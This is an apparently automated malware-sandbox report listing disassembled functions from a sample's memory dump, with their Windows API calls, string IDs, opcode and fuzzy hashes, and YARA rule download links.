                                                                                                                                  • Opcode Fuzzy Hash: 49821cff8a38523eba268b1b67d16726ed5d2cfa3fd96fc935abfd072f415af3
                                                                                                                                  • Instruction Fuzzy Hash: C1E0B670654308ABEB305F71EE0EB063A64B711706F200118F219E10F0DFF98521BB15
                                                                                                                                  Function 00F1BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                  • Opcode ID: 65804a1c97be8281064369940fda5a8da3a39c5fc898903fe04ad96d59a33ef5
                                                                                                                                  • Instruction ID: 8333613006a64e3023effedcc37f7e580a4fb5aa3ca3ddeba13a48ae7cd0ae81
                                                                                                                                  • Opcode Fuzzy Hash: 65804a1c97be8281064369940fda5a8da3a39c5fc898903fe04ad96d59a33ef5
                                                                                                                                  • Instruction Fuzzy Hash: 59E01272C0811CEAC754C6908D46BFA73BCAF04301F1044D2BE16E1044D3399BD4BB12
                                                                                                                                  Function 00F020F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00F020EC,?,00F022E0), ref: 00F02104
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F02116
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                                  • Opcode ID: b512c1446379ef6798d7da8cb0313b760aa90c912a50723023c63aa5f6b0603a
                                                                                                                                  • Instruction ID: 2d183c60ab2377e4ceef878c477414645c62ef6d1aa1df38b2fbcaa242bebfa8
                                                                                                                                  • Opcode Fuzzy Hash: b512c1446379ef6798d7da8cb0313b760aa90c912a50723023c63aa5f6b0603a
                                                                                                                                  • Instruction Fuzzy Hash: 22D0A7348003128FE7705F60E80E64236E4AB0431DF104419EB49D1994D770C481FA20
                                                                                                                                  Function 00EBE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBE6D9,?,00EBE55B,00F3DC28,?,?), ref: 00EBE6F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00EBE703
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3024904723
                                                                                                                                  • Opcode ID: 933fe278d39d9c16a92a754b251198ee3476df954431602598549955b30cde0b
                                                                                                                                  • Instruction ID: b09501abd0df697bb00991a79fb121c86d2935922d79045ab6008b2ecee8e3e0
                                                                                                                                  • Opcode Fuzzy Hash: 933fe278d39d9c16a92a754b251198ee3476df954431602598549955b30cde0b
                                                                                                                                  • Instruction Fuzzy Hash: 72D0A9354003238FE7302F20E84E6D33BE8BB0630EB10652BE995F2652DBB4C8809A10
                                                                                                                                  Function 00EBE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBE69C,74DF0AE0,00EBE5AC,00F3DC28,?,?), ref: 00EBE6B4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EBE6C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                  • Opcode ID: 8c9fc4dfcf8149d0bc827504c3aee82868cc9db94df813533862291a960daf32
                                                                                                                                  • Instruction ID: 4103505d8f597332d5fa971b03de27ffad463d96364d93bf6b33b4635ff52f80
                                                                                                                                  • Opcode Fuzzy Hash: 8c9fc4dfcf8149d0bc827504c3aee82868cc9db94df813533862291a960daf32
                                                                                                                                  • Instruction Fuzzy Hash: F6D0A9354003128FE7305F30E80A6C337E8AB2530EB10652AE985E2B68DBB0C880AA10
                                                                                                                                  Function 00EFEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EFEBAF,?,00EFEAAC), ref: 00EFEBC7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFEBD9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                  • Opcode ID: 1eda9281ea819a5fbfd3f0776a0bc4bb7a8f1e3b2cda4254f8fbe2372387d2a0
                                                                                                                                  • Instruction ID: 9b3880fc4bc336c2e259d9ab9cd1894994a33852c2f6997ca415ae6f6deb602c
                                                                                                                                  • Opcode Fuzzy Hash: 1eda9281ea819a5fbfd3f0776a0bc4bb7a8f1e3b2cda4254f8fbe2372387d2a0
                                                                                                                                  • Instruction Fuzzy Hash: FCD0A7344043169FE7305F30E849A5136D4AB0430DB209459FE56E1760DB70E8809650
                                                                                                                                  Function 00EE13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00EE1371,?,00EE1519), ref: 00EE13B4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00EE13C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                                  • Opcode ID: bd3f9d4ae758f2e138ca14407c6459d1b9265b82bb0471de565cca225172139b
                                                                                                                                  • Instruction ID: f79e485077fcc980d3aac9b764c70a1572f2de262755c18a2f75f74158819faf
                                                                                                                                  • Opcode Fuzzy Hash: bd3f9d4ae758f2e138ca14407c6459d1b9265b82bb0471de565cca225172139b
                                                                                                                                  • Instruction Fuzzy Hash: 75D0A7345003169FE7310F25E80878136E8AB4030DF115469E955E1960DA70C4C49760
                                                                                                                                  Function 00EE137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00EE135F,?,00EE1440), ref: 00EE1389
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00EE139B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                                  • Opcode ID: 3c469550c1bda3d97a121edf07059d917b622cb7f2e5402176a44d5a5f46b043
                                                                                                                                  • Instruction ID: df14a338daa90b841f4db1e766c4d7af75ab59646fd39a4d48873daaaec8c542
                                                                                                                                  • Opcode Fuzzy Hash: 3c469550c1bda3d97a121edf07059d917b622cb7f2e5402176a44d5a5f46b043
                                                                                                                                  • Instruction Fuzzy Hash: CDD0A93080031A9FE7300F2AEC087823AE8AF0430EF154869E985E2A90DAB0C8C5AB10
                                                                                                                                  Function 00F03ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00F03AC2,?,00F03CF7), ref: 00F03ADA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F03AEC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                  • Opcode ID: f84d72a9c2fa7123a9a9eb9a1a3e08f8f25ae671a7d19d460c501a466c81e1c4
                                                                                                                                  • Instruction ID: 9fc0eeaaa288225b14fefd69991e2bfb9ec7c20f83870cf34fe962da50d684ab
                                                                                                                                  • Opcode Fuzzy Hash: f84d72a9c2fa7123a9a9eb9a1a3e08f8f25ae671a7d19d460c501a466c81e1c4
                                                                                                                                  • Instruction Fuzzy Hash: 23D0A734E003179FE7304F60E80D68176D8AB1631DB104419E9D5D1590EFF4D4C0BA50
                                                                                                                                  Function 00EAAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00EF6AA6), ref: 00EAAB2D
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EAAB49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 820872866-0
                                                                                                                                  • Opcode ID: 8d06c1e25841b3d830e52f8233893bd11b820d5ac2fd8576d217817d1c9442ef
                                                                                                                                  • Instruction ID: a51046c6298bb800ec7299458072b0a2d89e089e0f8d21f81d7663abff164adc
                                                                                                                                  • Opcode Fuzzy Hash: 8d06c1e25841b3d830e52f8233893bd11b820d5ac2fd8576d217817d1c9442ef
                                                                                                                                  • Instruction Fuzzy Hash: EEA1067070020ADBDB15DF64E9416BDBBE1FF4D310F68517AE856AB290E730A8A0D792
                                                                                                                                  Function 00F00D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F00D85
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F00DC8
                                                                                                                                    • Part of subcall function 00F00458: CharLowerBuffW.USER32(?,?,?,?), ref: 00F00478
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F00FB2
                                                                                                                                  • _memmove.LIBCMT ref: 00F00FC2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                  • Opcode ID: 3bddef16a5ce27bf7e593f4e4b8eaf6d78bcca7ca868d7b58730c9cd7efb00e7
                                                                                                                                  • Instruction ID: a02df532a249359ee7d1a37e9d46c038d7f67bdbc52793b7e2294f5c9a07cfb6
                                                                                                                                  • Opcode Fuzzy Hash: 3bddef16a5ce27bf7e593f4e4b8eaf6d78bcca7ca868d7b58730c9cd7efb00e7
                                                                                                                                  • Instruction Fuzzy Hash: 8FB17071A043018FC714DF28C880A6AB7E4FF89714F14896EF999AB392DB31ED45DB91
                                                                                                                                  Function 00EFAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EFAF56
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFAF61
                                                                                                                                    • Part of subcall function 00EE1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EE10B8
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFAF6C
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB23F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                  • Opcode ID: 75965f8b39e28ce60eaa28c065f392ea927410e495402d9f81ea28cf0029dd9e
                                                                                                                                  • Instruction ID: b737f6a1ec57d03295c36f5ef81918568bb28f06411020e98c5a4c28e2964b7f
                                                                                                                                  • Opcode Fuzzy Hash: 75965f8b39e28ce60eaa28c065f392ea927410e495402d9f81ea28cf0029dd9e
                                                                                                                                  • Instruction Fuzzy Hash: C2A175356047059FDB10DF14C991B6AB7E4BF89324F149459FAAAAB3A1CB30FD40CB82
                                                                                                                                  Function 00EC42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3877424927-0
                                                                                                                                  • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                  • Instruction ID: 9fff5da3582f1328c31c87b5503ead873b8ba7aa185c87c5859857720ac13935
                                                                                                                                  • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                  • Instruction Fuzzy Hash: 7051B7B0A002459BDB288E6D8A60F9E77B5BF80324B24972DF875B62D1D7729D528B40
                                                                                                                                  Function 00F0C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0C354
                                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 00F0C384
                                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F0C3EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                  • Opcode ID: 35ce6426d33dedbbc19f24fd35c9ea634ae24ad3ba669a6b8bee2825f47567b8
